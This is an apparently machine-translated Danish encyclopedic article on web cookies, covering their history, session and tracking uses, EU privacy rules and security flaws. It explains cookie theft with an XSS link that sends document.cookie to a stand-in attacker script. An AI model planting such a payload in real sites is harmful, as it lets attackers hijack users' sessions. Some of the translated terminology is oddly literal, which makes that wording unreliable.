in ,

Internet-cookie: Hvad er det? Definition, oprindelse, typer og privatliv

Hvad er rollen for en cookie, hvad er det, og hvad er typerne af cookies? 🍪

Internet-cookie: Hvad er det? Definition, oprindelse, typer og privatliv
Internet-cookie: Hvad er det? Definition, oprindelse, typer og privatliv

Un cookie eller webcookie (Eller cookie, forkortet som vidne i Quebec) defineres af HTTP-kommunikationsprotokollen som værende en sekvens af information sendt af en HTTP-server til en HTTP-klient, som sidstnævnte returnerer hver gang den samme HTTP-server forespørges under visse betingelser.

Cookien svarer til en lille tekstfil gemt på terminalen af internetbrugeren. De har eksisteret i mere end 20 år og giver webstedsudviklere mulighed for at gemme brugerdata for at lette deres navigation og tillade visse funktionaliteter. Cookies har altid været mere eller mindre kontroversielle, fordi de indeholder resterende personlige oplysninger, som potentielt kan udnyttes af tredjeparter.

Den sendes som en HTTP-header af webserveren til webbrowseren, som returnerer den uændret, hver gang den tilgår serveren. En cookie kan bruges til en autentificering, en session (statsvedligeholdelse), og for gemme specifikke oplysninger om brugeren, såsom webstedspræferencer eller indholdet af en elektronisk indkøbskurv. Udtrykket cookie er afledt af magisk småkage, et velkendt koncept inden for UNIX computing, som inspirerede ideen og navnet på browsercookies. Der findes nogle få alternativer til cookies, hver med deres egne anvendelser, fordele og ulemper.

Da cookies er simple tekstfiler, er de ikke eksekverbare. De er ikke hverken spyware eller virus, selvom cookies fra nogle websteder registreres af mange antivirussoftware, fordi de tillader brugere at blive sporet, når de besøger flere websteder. 

De fleste moderne browsere tillader brugere at beslutte, om du vil acceptere eller afvise cookies. Brugere kan også vælge, hvor længe cookies opbevares. Den fuldstændige afvisning af cookies gør dog nogle websteder ubrugelige. Gem for eksempel indkøbskurve eller websteder, der kræver login ved hjælp af legitimationsoplysninger (brugernavn og adgangskode).

Indholdsfortegnelse

Historisk

udtrykket cookie stammer fra det engelske udtryk magisk småkage, som er en pakke med data, som et program modtager og returnerer uændret. Cookies blev allerede brugt i IT da Lou Montulli havde ideen til at bruge dem i webkommunikation i juni 1994. På det tidspunkt var han ansat i Netscape Communications, som havde udviklet en e-handelsapplikation til en kunde. Cookies gav en løsning på problemet med pålideligheden af ​​en butiks virtuelle indkøbskurvimplementering.

John Giannandrea og Lou Montulli skrev Netscapes første cookie-specifikation samme år. Version 0.9 beta af Mosaic Netscape, udgivet den 13. oktober 1994, integreret cookie-teknologi (se indlæg). Den første (ikke-eksperimentelle) brug af cookies var at afgøre, om besøgende på Netscape-webstedet havde besøgt webstedet før. Montulli indgav en patentansøgning for cookieteknologi i 1995, og US patent 5774670 blev givet. bevilget i 1998.

Efter at være blevet implementeret i Netscape 0.9 beta i 1994, blev cookies integreret i Internet Explorer 2, udgivet i oktober 1995.

Introduktionen af ​​cookies har endnu ikke været almindeligt kendt af offentligheden. Især blev cookies accepteret som standard i browserindstillinger, og brugere blev ikke informeret om deres tilstedeværelse. Nogle mennesker var opmærksomme på eksistensen af ​​cookies omkring første kvartal af 1995, men den brede offentlighed tog først deres eksistens til sig, efter at Financial Times offentliggjorde en artikel den 12. februar 1996. Samme år fik cookies en masse opmærksomhed i medierne på grund af mulige indgreb i privatlivet. Emnet cookies blev diskuteret i to høringer af American Federal Trade Commission i 1996 og 1997.

Udviklingen af ​​den officielle cookie-specifikation var allerede i gang. De første drøftelser af den officielle specifikation fandt sted i april 1995 på www-talk-mailinglisten. Der blev nedsat en særlig IETF-arbejdsgruppe. To alternative forslag til indførelse af statslige til HTTP-transaktioner blev foreslået af henholdsvis Brian Behlendorf og David Kristol, men gruppen, ledet af Kristol selv, besluttede at tage udgangspunkt i Netscapes specifikation. I februar 1996 fastslog arbejdsgruppen, at tredjepartscookies var en væsentlig trussel mod privatlivets fred. Specifikationen produceret af gruppen blev til sidst offentliggjort som RFC 2109.

Fra slutningen af ​​2014 ser vi et banner om cookies på mange sider. Der er mindst én browserudvidelse, der tillader banner vises ikke.

Typer af cookies og anvendelser

Sessionsledelse

Cookies kan bruges til at vedligeholde brugerdata under navigation, men også på tværs af flere besøg. Cookies blev indført for at give et middel til at implementere elektroniske indkøbskurve, en virtuel enhed, hvori brugeren kan samle de varer, han vil købe, mens han gennemser webstedet.

I disse dage gemmer apps som indkøbskurve i stedet listen over varer i en database på en server, hvilket er at foretrække; end at gemme dem i selve cookien. Webserveren sender en cookie indeholdende et unikt sessions-id. Webbrowseren returnerer derefter dette sessions-id ved hver efterfølgende anmodning, og varerne i kurven gemmes og knyttes til det samme unikke sessions-id.

Hyppig brug af cookies er nyttig til at logge ind på et websted ved hjælp af legitimationsoplysninger. Kort sagt, webserveren sender først en cookie, der indeholder et unikt sessions-id. Derefter angiver brugerne deres legitimationsoplysninger (normalt et brugernavn og en adgangskode). Webapplikationen autentificerer derefter sessionen og giver brugeren adgang til tjenesten.

personalisering

Cookies kan bruges til at huske information om brugeren af ​​et websted, for at vise ham passende indhold i fremtiden. For eksempel kan en webserver sende en cookie, der indeholder det sidste brugernavn, der blev brugt til at logge ind på det pågældende websted, så brugernavnet kan forududfyldes ved fremtidige besøg.

Mange websteder bruger cookies til personalisering baseret på brugerpræferencer. Brugere vælger deres præferencer i en formular og sender disse til serveren. Serveren koder præferencerne i en cookie og sender den tilbage til browseren. Efterfølgende, hver gang brugeren tilgår en side på dette websted, returnerer browseren cookien og derfor listen over præferencer; serveren kan derefter tilpasse siden efter brugerens præferencer. For eksempel giver Wikipedia-webstedet sine brugere mulighed for at vælge den side, de foretrækker. Google-søgemaskinen giver sine brugere (selvom de ikke er registreret) mulighed for at vælge det antal resultater, de vil se på hver resultatside.

Sporing

Sporingscookies bruges til at spore internetbrugernes browservaner. Dette kan også delvist gøres ved at bruge IP-adressen på den computer, der foretager en anmodning om en side, eller ved at bruge 'referrer' HTTP-headeren, som klienten sender med hver anmodning, men cookies giver mulighed for større præcision. Dette kan gøres som i følgende eksempel:

  1. Hvis brugeren kalder en side på et websted frem, og anmodningen ikke indeholder en cookie, antager serveren, at dette er den første side, som brugeren besøger. Serveren opretter derefter en tilfældig streng og sender den til browseren sammen med den anmodede side.
  2. Fra dette øjeblik vil cookien automatisk blive sendt af browseren, hver gang en ny side på webstedet kaldes. Serveren sender siden som normalt, men vil også logge URL'en på den kaldede side, datoen, tidspunktet for anmodningen og cookien i en logfil.

Ved at se på logfilen er det så muligt at se, hvilke sider brugeren har besøgt og i hvilken rækkefølge. For eksempel, hvis filen indeholder nogle få anmodninger lavet ved hjælp af id=abc-cookien, kan dette fastslå, at alle disse anmodninger kommer fra den samme bruger. Den anmodede URL, den dato og det klokkeslæt, der er knyttet til anmodningerne, gør det muligt at spore brugerens browsing.

Tredjepartscookies og web-beacons, forklaret nedenfor, muliggør desuden sporing på tværs af forskellige websteder. Single site tracking bruges generelt til statistiske formål. I modsætning hertil bruges sporing på tværs af forskellige websteder ved hjælp af tredjepartscookies generelt af reklamevirksomheder til at producere anonyme brugerprofiler (som derefter bruges til at bestemme, hvilke annoncer der skal vises til brugeren, samt til at sende ham e-mails svarende til disse annoncer — SPAM ).

Sporingscookies er en risiko for krænkelse af brugernes privatliv, men de kan nemt slettes. De fleste moderne browsere indeholder en mulighed for automatisk at slette vedvarende cookies, når applikationen lukkes.

Tredjeparts cookies

Billeder og andre objekter indeholdt på en webside kan ligge på andre servere end den, der hoster siden. For at vise siden downloader browseren alle disse objekter. De fleste websteder indeholder oplysninger fra forskellige kilder. Hvis du for eksempel skriver www.example.com i din browser, vil der ofte være objekter eller annoncer på en del af siden, som kommer fra andre kilder, det vil sige fra et andet domæne end www. .example.com. "Førstepartscookies" er cookies, der indstilles af domænet, der er angivet i browserens adresselinje. Tredjepartscookies sættes af et af sideobjekterne, der kommer fra et andet domæne.

Som standard accepterer browsere som Mozilla Firefox, Microsoft Internet Explorer og Opera tredjepartscookies, men brugere kan ændre indstillingerne i browserindstillingerne for at blokere dem. Der er ingen sikkerhedsrisiko forbundet med tredjepartscookies, der aktiverer webfunktionalitet, men de bruges også til at spore brugere. fra site til site.

Værktøjer såsom Ghostery, der er tilgængelige for alle browsere, inklusive Google Chrome, kan blokere udvekslinger mellem tredjeparter.

Implementering

En mulig interaktion mellem en webbrowser og serveren, der hoster websiden. Serveren sender en cookie til browseren, og browseren sender den tilbage, når den kalder en anden side.
En mulig interaktion mellem en webbrowser og serveren, der hoster websiden. Serveren sender en cookie til browseren, og browseren sender den tilbage, når den kalder en anden side.

Cookies er små stykker data, der sendes af webserveren til browseren. Browseren returnerer dem uændret til serveren og introducerer tilstand (hukommelse af tidligere hændelser) i den ellers statsløse HTTP-transaktion. Uden cookies er hver hentning af en webside eller en komponent af en webside en isoleret hændelse, uafhængig af andre anmodninger til det samme websted. Udover at kunne indstilles af webserveren, kan cookies også indstilles af scriptsprog som JavaScript, hvis det understøttes og er godkendt af browseren.

Den officielle cookie-specifikation foreslår, at browsere skal kunne gemme og gensende et minimum antal cookies. Specifikt skal en browser være i stand til at gemme mindst 300 cookies på hver fire kilobyte og mindst 20 cookies til en enkelt server eller domæne.

Ifølge afsnit 3.1 i RFC 2965, cookienavne skelner mellem store og små bogstaver.

En cookie kan angive datoen for dens udløb, i hvilket tilfælde cookien vil blive slettet på denne dato. Hvis cookien ikke angiver en udløbsdato, slettes cookien, så snart brugeren forlader sin browser. Derfor er angivelse af en udløbsdato en måde at få cookien til at overleve gennem flere sessioner. Af denne grund siges cookies med en udløbsdato at være vedholdende. Et eksempel på en applikation: et detailwebsted kan bruge vedvarende cookies til at registrere de varer, som brugerne har lagt i deres indkøbskurv (i virkeligheden kan cookien referere til en post gemt i en database på salgsstedet og ikke på din computer) . På denne måde, hvis brugere forlader deres browser uden at foretage et køb og vender tilbage til den senere, vil de være i stand til at finde varerne i indkøbskurven igen. Hvis disse cookies ikke gav en udløbsdato, ville de udløbe, når browseren blev lukket, og oplysningerne om indholdet i kurven ville gå tabt.

Cookies kan begrænses i omfang til et specifikt domæne, underdomæne eller sti på den server, der har oprettet dem.

Overførslen af ​​websider sker ved hjælp af HyperText Transfer Protocol (HTTP). Ved at ignorere cookies kalder browsere en side fra webservere ved generelt at sende dem en kort tekst kaldet HTTP-anmodning. For at få adgang til siden www.example.org/index.html opretter browsere f.eks. forbindelse til serveren www.example.org og sender en anmodning, der ser sådan ud:

GET /index.html HTTP/1.1Host: www.example.org
navigatorserveur

Serveren reagerer ved at sende den anmodede side, efterfulgt af en lignende tekst, og hele kaldes HTTP-svar. Denne pakke kan indeholde linjer, der instruerer browseren om at gemme cookies:

HTTP/1.1 200 OKIndholdstype: text/htmlSet-Cookie: navn=værdi
(HTML-side)
navigatorserveur

Serveren sender kun Set-Cookie-linjen, hvis serveren ønsker, at browseren skal gemme en cookie. Set-Cookie er en anmodning til browseren om at gemme navn=værdi-strengen og returnere den i alle fremtidige anmodninger til serveren. Hvis browseren understøtter cookies, og cookies er aktiveret i browserindstillingerne, vil cookien blive inkluderet i alle efterfølgende anmodninger til den samme server. For eksempel kalder browseren siden www.example.org/news.html ved at sende følgende anmodning til serveren www.example.org:

GET /news.html HTTP/1.1Host: www.example.orgCookie: navn=værdiAcceptér: */*
navigatorserveur

Dette er en anmodning om en anden side fra den samme server, og adskiller sig fra den første ovenfor, fordi den indeholder en streng, som serveren tidligere har sendt til browseren. Takket være dette middel ved serveren, at denne anmodning er knyttet til den forrige. Serveren reagerer ved at sende den kaldte side og også ved at tilføje andre cookies til den.

Værdien af ​​cookien kan ændres af serveren ved at sende en ny linje Set-Cookie: name=new_value som svar på den kaldte side. Browseren erstatter derefter den gamle værdi med den nye.

Set-Cookie-linjen er normalt oprettet af et CGI-program eller et andet scriptsprog, ikke af HTTP-serveren. HTTP-serveren (eksempel: Apache) vil kun overføre resultatet af programmet (et dokument, der er foranstillet af overskriften, der indeholder cookies) til browseren.

Cookies kan også indstilles af JavaScript eller andre lignende sprog, der kører i browseren, det vil sige på klientsiden frem for serversiden. I JavaScript bruges document.cookie-objektet til dette formål. For eksempel opretter erklæringen document.cookie = "temperatur=20" en cookie med navnet "temperatur" og med en værdi på 20.

Eksempel på et HTTP-svar fra google.com, som sætter en cookie med attributter.
Eksempel på et HTTP-svar fra google.com, som sætter en cookie med attributter.

Ud over navn/værdi-parret kan en cookie også indeholde en udløbsdato, en sti, et domænenavn og den tilsigtede type forbindelse, dvs. normal eller krypteret. RFC 2965 definerer også, at cookies skal have et obligatorisk versionsnummer, men dette er generelt udeladt. Disse datadele følger name=new_value-parret og er adskilt af semikolon. For eksempel kan en cookie oprettes af serveren ved at sende en Set-Cookie-linje: name=new_value; udløber=dato; sti=/; domæne=.eksempel.org.

Cookies udløber og sendes derefter ikke af browseren til serveren i følgende situationer:

  • Når browseren er lukket, hvis cookien ikke er vedvarende.
  • Når cookiens udløbsdato er passeret.
  • Når cookiens udløbsdato ændres (af serveren eller scriptet) til en dato i fortiden.
  • Når browseren sletter cookien på anmodning fra brugeren.

Den tredje situation tillader servere eller scripts eksplicit at slette en cookie. Bemærk, at det er muligt med Google Chrome-webbrowseren at kende udløbsdatoen for en bestemt cookie ved at få adgang til indholdsindstillingerne. En cookie gemt på en computer kan meget vel forblive der i flere årtier, hvis der ikke tages nogen procedure for at slette den.

Stereotyper

Siden deres introduktion på internettet er der cirkuleret mange ideer om cookies på internettet og i medierne. I 1998 fastslog CIAC, et team til overvågning af computerhændelser fra det amerikanske energiministerium, at sikkerhedssårbarheder i cookies var "i det væsentlige ikke-eksisterende" og forklarede, at "oplysninger om oprindelsen af ​​dine besøg og detaljerne om de websider, du har besøgt findes allerede i webservernes logfiler”. I 2005 offentliggjorde Jupiter Research resultaterne af en undersøgelse, hvor en betydelig procentdel af de adspurgte overvejede følgende udsagn:

  • Cookies er ligesom virus, inficerer de brugernes harddiske.
  • Cookies genererer pop-up.
  • Cookies bruges til at sende spam.
  • Cookies bruges kun til annoncering.

Cookies kan ikke slette eller læse information fra brugerens computer. Cookies gør det dog muligt at registrere de websider, som en bruger besøger på et givet websted eller et sæt af websteder. Disse oplysninger kan indsamles i en brugerprofil, der kan bruges eller videresælges til tredjeparter, hvilket kan udgøre alvorlige privatlivsproblemer. Nogle profiler er anonyme i den forstand, at de ikke indeholder nogen personlige oplysninger, men selv sådanne profiler kan være tvivlsomme.

Ifølge samme undersøgelse ved en stor procentdel af internetbrugere ikke, hvordan man sletter cookies. En af grundene til, at folk ikke har tillid til cookies, er, at nogle websteder har misbrugt det personligt identificerende aspekt af cookies og delt disse oplysninger med andre kilder. En stor procentdel af målrettet annoncering og uopfordret e-mail, der betragtes som spam, kommer fra information hentet fra sporingscookies.

Browserindstillinger

De fleste browsere understøtter cookies og giver brugeren mulighed for at deaktivere dem. De mest almindelige muligheder er:

  • Aktiver eller deaktiver cookies fuldstændigt, så de konstant accepteres eller blokeres.
  • Tillad brugeren at se de aktive cookies på en given side ved at indtaste javascript: alert(document.cookie) i adresselinjen i browseren. Nogle browsere inkorporerer en cookie-manager for brugeren, som kan se og selektivt slette cookies, der i øjeblikket er gemt af browseren.

De fleste browsere tillader også fuld sletning af personlige data, som inkluderer cookies. Der findes også yderligere moduler til at kontrollere cookie-tilladelser.

Privatliv og tredjepartscookies

I dette fiktive eksempel har et reklamefirma placeret bannere på to hjemmesider. Ved at hoste bannerne på sine servere og bruge tredjepartscookies, er reklamefirmaet i stand til at spore brugerens navigation gennem disse to websteder.

Cookies har vigtige konsekvenser for webbrugeres privatliv og anonymitet. Selvom cookies kun sendes tilbage til den server, der sætter dem, eller til en server, der tilhører det samme internetdomæne, kan en webside dog indeholde billeder eller andre komponenter, der er gemt på servere, der tilhører andre domæner. De cookies, der sættes under gendannelsen af ​​disse eksterne komponenter, kaldes tredjepartscookies. Dette inkluderer cookies fra uønskede pop op-vinduer.

Annoncevirksomheder bruger tredjepartscookies til at spore brugere på tværs af de forskellige websteder, de besøger. Især kan et reklamefirma spore en bruger på tværs af alle sider, hvor det har placeret reklamebilleder eller en sporingspixel. Kendskab til de sider, som brugeren besøger, gør det muligt for reklamefirmaet at målrette brugerens annonceringspræferencer.

Muligheden for at opbygge en brugerprofil anses af nogle for at være en krænkelse af privatlivets fred, især når sporing udføres på tværs af forskellige domæner ved hjælp af tredjepartscookies. Af denne grund har nogle lande cookie-lovgivning.

Den amerikanske regering implementerede strenge regler for placering af cookies i 2000, efter at det blev afsløret, at Det Hvide Hus' Drug Policy Office brugte cookies til at spore computere på brugere, der så online narkotikareklamer. I 2002 opdagede privatlivsaktivisten Daniel Brandt, at CIA efterlod vedvarende cookies på computere, der havde besøgt dets websteder. Da CIA blev informeret om dette brud, erklærede, at disse cookies ikke var sendt med vilje, og holdt op med at sætte dem. Den 25. december 2005 opdagede Brandt, at National Security Agency (NSA) havde efterladt to vedvarende cookies på besøgendes computere på grund af en softwareopdatering. Efter at være blevet underrettet, deaktiverede NSA straks cookies.

I Det Forenede Kongerige er Cookie lov “, der trådte i kraft den 25. maj 2012, forpligter webstederne til at erklære deres hensigter, hvilket giver brugerne mulighed for at vælge, om de vil efterlade spor eller ej af deres passage på internettet. De kan således beskyttes mod reklamemålretning. Imidlertid, ifølge The Guardian, samtykket fra internetbrugere er ikke nødvendigvis eksplicit; der er foretaget ændringer i vilkårene for brugersamtykke, hvilket gør det således underforstået.

Direktiv 2002/58 om privatlivets fred

Direktiv 202/58 om privatlivets fred og elektronisk kommunikation, indeholder regler om brugen af ​​cookies. Specielt kræver artikel 5, stk. 3 i dette direktiv, at lagring af data (såsom cookies) på brugerens computer kun kan ske, hvis:

  • brugeren er informeret om, hvordan dataene bruges;
  • brugeren får mulighed for at afvise denne lagring. Det fremgår dog også af denne artikel, at opbevaring af data af tekniske årsager er undtaget fra denne lov.

Direktivet, der skulle implementeres fra oktober 2003, blev dog kun meget ufuldstændigt gennemført i praksis ifølge en rapport fra december 2004, som også påpegede, at visse medlemsstater (Slovakiet, Letland, Grækenland, Belgien og Luxembourg) endnu ikke havde gennemført direktiv i national ret.

Ifølge udtalelsen fra G29 i 2010 forbliver dette direktiv, som især betinger brugen af ​​cookies til adfærdsbaserede reklameformål, med udtrykkeligt samtykke fra internetbrugeren meget dårligt anvendt. Faktisk gør de fleste websteder det på en måde, der ikke er i overensstemmelse med direktivet, ved at begrænse sig til et simpelt "banner", der informerer om brugen af ​​"cookies" uden at give oplysninger om anvendelserne, uden at skelne mellem "tekniske" cookies. "sporings"-cookies, ej heller for at tilbyde et reelt valg til brugeren, der ønsker at bevare tekniske cookies (såsom indkøbskurvstyringscookies) og afvise "sporings"-cookies. Faktisk fungerer mange websteder ikke korrekt, hvis cookies afvises, hvilket ikke er i overensstemmelse med direktiv 2002/58 eller direktiv 95/46 (Beskyttelse af personlige data).

Direktiv 2009 / 136 / CE

Dette materiale er blevet opdateret af direktiv 2009/136/EF af 25. november 2009, som siger, at "lagring af information eller opnåelse af adgang til allerede lagret information i en abonnents eller brugers terminaludstyr kun er tilladt på betingelse af, at abonnent eller bruger har givet sit samtykke, efter at have modtaget, i overensstemmelse med direktiv 95/46/EF, klare og fuldstændige oplysninger mellem andre om formålene med behandlingen”. Det nye direktiv styrker derfor forpligtelserne forud for placering af cookies på internetbrugerens computer.

I de indledende betragtninger af direktivet præciserer den europæiske lovgiver dog: "Hvor det er teknisk muligt og effektivt, i overensstemmelse med de relevante bestemmelser i direktiv 95/46/EF, kan brugerens samtykke med hensyn til behandlingen udtrykkes gennem brug af de relevante indstillinger for en browser eller anden applikation”. Men faktisk gør ingen browser til dato det muligt at adskille de væsentlige tekniske cookies fra de valgfrie, som bør overlades til brugerens valg.

Dette nye direktiv blev gennemført af belgiske parlamentsmedlemmer i juli 2012. En undersøgelse fra 2014 viser, at selv parlamentsmedlemmer kæmper for at ansøge direktivets begrænsninger.

P3P

P3P-specifikationen inkluderer muligheden for en server til at angive en privatlivspolitik, som definerer, hvilken slags information den indsamler og til hvilket formål. Disse politikker omfatter (men er ikke begrænset til) brugen af ​​oplysninger indsamlet ved hjælp af cookies. I henhold til definitionerne af P3P kan en browser acceptere eller afvise cookies ved at sammenligne privatlivspolitikkerne med brugerens præferencer eller ved at spørge brugeren og præsentere den fortrolighedserklæring, som serveren har erklæret.

Mange browsere, inklusive Apple Safari og Microsoft Internet Explorer version 6 og 7, understøtter P3P, som gør det muligt for browseren at bestemme, om den skal acceptere tredjeparts cookielagring. Opera-browseren giver brugerne mulighed for at afvise tredjepartscookies og oprette en global og specifik sikkerhedsprofil for internetdomæner. Mozilla Firefox version 2 droppede P3P-understøttelse, men genindsatte den i version 3.

Tredjepartscookies kan blokeres af de fleste browsere for at øge privatlivets fred og reducere annoncesporing uden at påvirke brugerens weboplevelse negativt. Mange reklamebureauer tilbyder en mulighed fravælge til målrettet annoncering, ved at oprette en generisk cookie i browseren, som deaktiverer denne målretning, men en sådan løsning er ikke praktisk effektiv, når den respekteres, fordi denne generiske cookie slettes, så snart brugeren sletter disse cookies, hvilket annullerer tilvalget ud beslutning.

Ulemper ved cookies

Ud over privatlivsproblemer har cookies også nogle tekniske ulemper. Især identificerer de ikke altid brugerne nøjagtigt, de kan bremse webstedets ydeevne, når de er i stort antal, de kan bruges til sikkerhedsangreb, og de er i konflikt med softwarens repræsentative statsoverførsel, arkitektoniske stil.

Upræcis identifikation

Hvis der bruges mere end én browser på en computer, er der i hver af dem altid en separat lagerenhed til cookies. Cookies identificerer derfor ikke en person, men kombinationen af ​​en brugerkonto, en computer og en webbrowser. Alle kan således bruge disse konti, computere eller browsere, der har et udvalg af cookies. Tilsvarende skelner cookies ikke mellem flere brugere, der deler den samme brugerkonto, computer og browser, såsom på "internetcaféer" eller andre steder, der giver gratis adgang til computerressourcer.

Men i praksis viser dette udsagn sig at være fejlagtigt i de fleste tilfælde, fordi en "personlig" computer (eller en smartphone eller tablet, hvilket er værre) i dag hovedsageligt bruges af en enkelt person. Dette svarer til at målrette en bestemt person og gennem mængden af ​​indsamlede oplysninger nå frem til personlig målretning, selvom personen ikke "nemlig" er identificeret.

En cookie kan blive stjålet af en anden computer på netværket.

Under normal drift sendes cookies tilbage mellem serveren (eller en gruppe af servere i samme domæne) og brugerens computerbrowser. Da cookies kan indeholde følsomme oplysninger (brugernavn, en adgangskode, der bruges til godkendelse osv.), bør deres værdier ikke være tilgængelige for andre computere. Cookietyveri er en handling, hvor en uautoriseret tredjepart opfanger cookies.

Cookies kan blive stjålet via en pakkesniffer i et angreb kaldet session hijacking. Trafik på nettet kan opsnappes og læses af andre computere end dem, der sender og modtager (især på det ukrypterede offentlige Wi-Fi-rum). Denne trafik inkluderer cookies sendt over sessioner ved hjælp af den almindelige HTTP-protokol. Når netværkstrafikken ikke er krypteret, kan ondsindede brugere således læse andre brugeres kommunikation på netværket ved hjælp af "packet sniffers".

Dette problem kan løses ved at kryptere forbindelsen mellem brugerens computer og serveren ved hjælp af HTTPS-protokollen. En server kan angive en sikkert flag mens du sætter en cookie; browseren vil kun sende det over en sikker linje, såsom en SSL-forbindelse.

Men mange websteder, selvom de bruger HTTPS-krypteret kommunikation til brugergodkendelse (dvs. login-siden), sender senere sessionscookies og andre data som normalt gennem ukrypterede HTTP-forbindelser af effektivitetsmæssige årsager. Angribere kan således opsnappe andre brugeres cookies og efterligne dem på passende websteder eller bruge dem i cookie-angreb.

Scripting på webstedet: en cookie, der kun bør udveksles mellem serveren og klienten, sendes til en anden tredjepart.

En anden måde at stjæle cookies på er at scripte websteder og få browseren til selv at sende cookies til ondsindede servere, der aldrig modtager dem. Moderne browsere tillader eksekvering af eftertragtede dele af kode fra serveren. Hvis der tilgås cookies under kørsel, kan deres værdier kommunikeres i en eller anden form til servere, der ikke bør få adgang til dem. Kryptering af cookies, før de sendes over netværket, hjælper ikke med at forpurre angrebet.

Denne type in-site scripting bruges typisk af angribere på websteder, der tillader brugere at poste HTML-indhold. Ved at integrere en del af kompatibel kode i HTML-bidraget kan en angriber modtage cookies fra andre brugere. Kendskab til disse cookies kan bruges ved at oprette forbindelse til det samme websted ved hjælp af de stjålne cookies, og dermed blive genkendt som den bruger, hvis cookies blev stjålet.

En måde at forhindre sådanne angreb på er at bruge HttpOnly-flaget; det er en mulighed, introduceret siden version 6 af Internet Explorer i PHP siden version 5.2.0, som er planlagt til at gøre cookien utilgængelig for klienten tæt på scriptet. Dog bør webudviklere tage højde for dette i deres webstedsudvikling, så de er immune over for scripting på webstedet.

En anden sikkerhedstrussel, der bruges, er efterspørgselsfabrikation på webstedet.

Den officielle tekniske specifikation tillader, at cookies kun sendes tilbage til servere på det domæne, de stammer fra. Værdien af ​​cookies kan dog sendes til andre servere ved hjælp af andre midler end cookie-headers.

Især er scriptsprog som JavaScript generelt tilladt at få adgang til cookieværdier og er i stand til at sende vilkårlige værdier til enhver server på internettet. Denne scripting-funktion bruges fra websteder, der tillader brugere at sende HTML-indhold, som andre brugere kan se.

For eksempel kan en hacker, der opererer på domænet example.com, sende en kommentar, der indeholder følgende link, der peger på en populær blog, som de ellers ikke kontrollerer:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Når en anden bruger klikker på dette link, udfører browseren onclick-attributdelen af ​​koden, så den erstatter document.cookie-strengen med listen over brugercookies, der er aktive for denne side. Derfor sendes denne liste over cookies til example.com-serveren, og angriberen er derfor i stand til at indsamle denne brugers cookies.

Denne type angreb er svær at opdage på brugersiden, fordi scriptet kommer fra det samme domæne, der satte cookien, og operationen med at sende værdierne ser ud til at være godkendt af det pågældende domæne. Det anses for, at det er administratorernes ansvar, der driver denne type websteder, at indføre restriktioner, der forhindrer offentliggørelse af ondsindet kode.

Cookies er ikke direkte synlige for programmer på klientsiden som JavaScript, hvis de blev sendt med HttpOnly-flaget. Fra serverens synspunkt er den eneste forskel, at der i linjen i Set-Cookie-headeren er tilføjet et nyt felt, der indeholder strengen HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Når browseren modtager en sådan cookie, er det meningen, at den skal bruge den normalt i den følgende HTTP-udveksling, men uden at gøre den synlig for scripts, der udføres på klientsiden. HttpOnly-flaget er ikke en del af nogen officiel teknisk specifikation og er ikke implementeret i alle browsere. Bemærk, at der i øjeblikket ikke er nogen måde at forhindre læsning og skrivning af sessionscookies ved hjælp af XMLHTTPRequest-metoden.

Ændring af indhold: en angriber sender en ugyldig cookie til en server, muligvis lavet af en gyldig cookie sendt af serveren.

Så snart cookies skal gemmes og returneres uændret til serveren, kan en angriber ændre værdien af ​​cookies, før de sendes tilbage til serveren. For eksempel, hvis en cookie indeholder den samlede værdi, som brugeren skal betale for de varer, der er lagt i butikkens indkøbskurv, udsætter en ændring af denne værdi serveren for risikoen for, at angriberen opkræver mindre end startprisen. Processen med at ændre værdien af ​​cookies kaldes småkageforgiftning og kan bruges efter cookie-tyveri for at gøre angrebet vedvarende.

I cookie-tilsidesættelsesmetoden udnytter angriberen en browserfejl til at sende en ugyldig cookie til serveren.

De fleste websteder gemmer dog kun et sessions-id - et tilfældigt genereret unikt nummer, der bruges til at identificere sessionsbrugeren - i selve cookien, mens al anden information gemmes på serveren. I dette tilfælde er dette problem stort set løst.

Hvert websted forventes at have sine egne cookies, så et websted bør ikke være i stand til at ændre eller oprette cookies knyttet til et andet websted. En webbrowsersikkerhedsfejl kan gøre det muligt for ondsindede websteder at bryde denne regel. Udnyttelsen af ​​en sådan fejl kaldes almindeligvis madlavning på tværs af steder. Formålet med sådanne angreb kan være sessions-id-tyveri.

Brugere bør bruge de nyeste versioner af webbrowsere, hvor disse sårbarheder praktisk talt er elimineret.

Modstridende tilstand mellem klient og server

Brugen af ​​cookies kan generere en modsigelse mellem klientens tilstand og den tilstand, der er gemt i cookien. Hvis brugeren anskaffer sig en cookie og klikker på "Tilbage"-knappen i browseren, er browserens tilstand generelt ikke den samme som før denne erhvervelse. For eksempel, hvis kurven i en netbutik er oprettet ved hjælp af cookies, kan indholdet af kurven ikke ændres, når brugeren vender tilbage til browserhistorikken: hvis brugeren trykker på en knap for at tilføje en artikel i sin kurv og klikker på "Return". "-knappen forbliver artiklen i denne. Dette er muligvis ikke hensigten fra brugeren, som bestemt ønsker at annullere tilføjelsen af ​​artiklen. Dette kan føre til upålidelighed, forvirring og fejl. Så webudviklere bør være opmærksomme på dette problem og implementere foranstaltninger til at håndtere situationer som denne.

Vedvarende cookies er blevet kritiseret af privatlivssikkerhedseksperter for ikke at være indstillet til at udløbe hurtigt nok, hvilket gør det muligt for websteder at spore brugere og opbygge deres profil over tid. Dette aspekt af cookies er også en del af sessionskapringsproblemet, fordi en stjålet persistent cookie kan bruges til at efterligne en bruger i en længere periode.

Læs også: GAFAM: hvem er de? Hvorfor er de (nogle gange) så skræmmende?

Alternativer til cookies

Nogle handlinger, der kan udføres ved hjælp af cookies, kan også udføres ved hjælp af andre mekanismer, der omgår cookies eller genskaber slettede cookies, hvilket skaber privatlivsproblemer på samme måde (eller nogle gange værre, fordi de så er usynlige) end cookies.

IP-adresse

Brugere kan spores med IP-adressen på den computer, der ringer til siden. Denne teknik har været tilgængelig siden introduktionen af ​​World Wide Web, da siderne downloades, anmoder serveren om IP-adressen på den computer, der kører browseren eller proxyen, hvis ingen bruges. Serveren kan spore disse oplysninger, uanset om der er cookies i brug eller ej. Disse adresser er dog typisk mindre pålidelige til at identificere en bruger end cookies, fordi computere og proxyer kan deles af flere brugere, og den samme computer kan modtage en anden IP-adresse på hver arbejdssession (såsom c ofte er tilfældet for telefonforbindelser) .

Sporing af IP-adresser kan være pålidelig i nogle situationer, såsom bredbåndsforbindelser, der bevarer den samme IP-adresse i lang tid, så længe der er tændt for strømmen.

Nogle systemer som Tor er designet til at opretholde anonymiteten på internettet og gøre sporing med IP-adresse umulig eller upraktisk.

URL

